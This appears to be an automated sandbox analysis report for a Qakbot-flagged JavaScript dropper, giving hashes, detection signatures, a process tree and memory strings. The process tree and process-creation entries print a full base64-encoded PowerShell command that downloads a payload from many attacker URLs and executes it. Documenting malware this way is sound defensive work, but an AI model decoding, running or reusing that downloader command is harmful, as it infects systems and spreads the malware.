Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Semischolastica.js

Overview

General Information

Sample Name:Semischolastica.js
Analysis ID:876155
MD5:476fad0a9b9f0b665b416beb78b55cff
SHA1:c5631292a9e8c5887e3674c819cd3ee4aab786dd
SHA256:aa18039b1459c1054b2ead589186d0c3e1e02cdfebf5f4642e1b5cc13af8c104
Tags:js
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6660 cmdline: "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6908 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBRAEEAdQBBAEQARQBBAE0AZwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABZAEEATABnAEEANQBBAEQAWQBBACIAOwAkAGgAeQBkAHIAYQB1AGwAaQBjAEMAYQBwAHAAYQBkAG8AYwBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMABBAEQASQBBAEwAZwBBAHkAQQBEAFEAQQBNAEEAQQA9AEkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBADMAQQBEAFEAQQBMAGcAQQB4AEEARABrAEEATgBRAEEAdQBBAEQARQBBAE4AUQBBAHkAQQBBAD0APQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBjAEEAQgBoAEEASABRAEEAWgBRAEEAdQBBAEgATQBBAGQAUQBCAHcAQQBIAEEAQQBiAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQAwAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQAaQBtAGIAcgBpAGMAYQB0AGUAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB4AEEASABVAEEAYQBRAEIAawBBAEcARQBBAGIAUQBBAHUAQQBHAFUAQQBiAGcAQgBuAEEARwBrAEEAYgBnAEIAbABBAEcAVQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQA9AFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBAHcAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAWQBBAFgAdABJAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBnAEEAWQBRAEIAdQBBAEcAUQBBAGQAdwBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGQAQQBCAHAAQQBIAE0AQQAiADsAJABlAG4AYQBtAGkAbgBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVABlAG4AYQBpAGwAbABlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAZQBuAGEAbQBpAG4AZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHAAYQByAGEAcwBuAGkAYQBCAGUAbAB0AGUAbgBlAC4AVQBuAGgAaQB0AGMAaABlAGQARwBhAG0AYgBhAHMAOwAkAEgAYQB5AGMAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBPAEEAQQB1AEEARABnAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAGsAQQBNAEEAQQA9AEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBVAEEAZQBBAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCADMAQQBHAFUAQQBZAGcAQgBqAEEARwBFAEEAYgBRAEEAPQBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgATQBBAFkAdwBCAHAAQQBIAFEAQQBhAFEAQgBqAEEARwBFAEEAYgBBAEIARABBAEcARQBBAGMAZwBCADUAQQBHADgAQQBZAHcAQgBoAEEASABJAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQQA9AD0AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE4AQQBHAGsAQQBjAHcAQgB2AEEARwBNAEEAWQBRAEIAdwBBAEcANABBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgAxAEEASABNAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcABhAHIAYQBzAG4AaQBhAEIAZQBsAHQAZQBuAGUALgBVAG4AaABpAHQAYwBoAGUAZABHAGEAbQBiAGEAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAOQA4ADAANgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGMAdwBCAHUAQQBHAGsAQQBZAFEAQgBDAEEARwBVAEEAYgBBAEIAMABBAEcAVQBBAGIAZwBCAGwAQQBDADQAQQBWAFEAQgB1AEEARwBnAEEAYQBRAEIAMABBAEcATQBBAGEAQQBCAGwAQQBHAFEAQQBSAHcAQgBoAEEARwAwAEEAWQBnAEIAaABBAEgATQBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgByAGUAZQBjAGgAYwBsAG8AdABoAFMAbwB1AGwAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEASABJAEEAWgBRAEIAegBBAEgAQQBBAGQAUQBCAHkAQQBIAEkAQQBaAFEAQgBrAEEARQA4AEEAZABRAEIAMABBAEcASQBBAFkAUQBCAHkAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEATABnAEIAaABBAEcATQBBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEARwBFAEEAYgBnAEIAMABBAEgATQBBAGIAVgBaAHgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYQBBAEIAcABBAEgAQQBBAGQAdwBCAHkAQQBHAGsAQQBaAHcAQgBvAEEASABRAEEAWgBRAEIAeQBBAEgAawBBAEwAZwBCADEAQQBHAHMAQQBiAFYAWgB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAQQBCAGwAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAYwB3AEIAMABBAEYAQQBBAGMAZwBCAGwAQQBHAFUAQQBiAGcAQgBwAEEARwA0AEEAWgB3AEEAdQBBAEcASQBBAGMAZwBCADEAQQBIAE0AQQBjAHcAQgBsAEEARwB3AEEAYwB3AEEAPQAiADsAJABhAGwAaQBlAG4AaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBADUAQQBDADQAQQBNAFEAQQAxAEEARABjAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA= MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6908INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x6cd89:$b2: ::FromBase64String(
  • 0x1d7c9:$s1: -join
  • 0x1d84f:$s1: -join
  • 0x1d964:$s1: -join
  • 0x1dba8:$s1: -join
  • 0x1dbda:$s1: -join
  • 0x1dc22:$s1: -join
  • 0x1dc4f:$s1: -join
  • 0x1e0ba:$s1: -join
  • 0x1e116:$s1: -join
  • 0x1e14e:$s1: -join
  • 0x1e19d:$s1: -join
  • 0x1ec00:$s1: -join
  • 0x2063c:$s1: -join
  • 0x2f399:$s1: -join
  • 0xa0fcc:$s1: -join
  • 0xae0a1:$s1: -join
  • 0xb1473:$s1: -join
  • 0xb1b25:$s1: -join
  • 0xb3616:$s1: -join
  • 0xb581c:$s1: -join

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Semischolastica.jsAvira: detected
Multi AV Scanner detection for submitted file
Source: Semischolastica.jsReversingLabs: Detection: 13%
Source: Semischolastica.jsVirustotal: Detection: 30%Perma Link
Antivirus detection for dropped file
Source: C:\ProgramData\WeigelasScribbleable.jsAvira: detection malicious, Label: JS/Qakbot.G
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs089 source: powershell.exe, 00000003.00000002.965250834.0000021D7D1A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbGM= source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdbY source: powershell.exe, 00000003.00000002.964639964.0000021D7CFA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7CFBA000.00000004.00000020.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.942982234.0000021D64FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000003.576624721.000001CC97AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.576968524.000001CC99F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579865423.000001CC99B10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579593243.000001CC99A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592556553.0000017FB91B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592773841.0000017FB92B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.590632857.0000017FB96B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.582806752.0000017FB72FD000.00000004.00000020.00020000.00000000.sdmp, Semischolastica.js, WeigelasScribbleable.js.0.drString found in binary or memory: https://github.com/imaya/zlib.js
Source: powershell.exe, 00000003.00000002.942982234.0000021D66B29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 6908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQ
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaA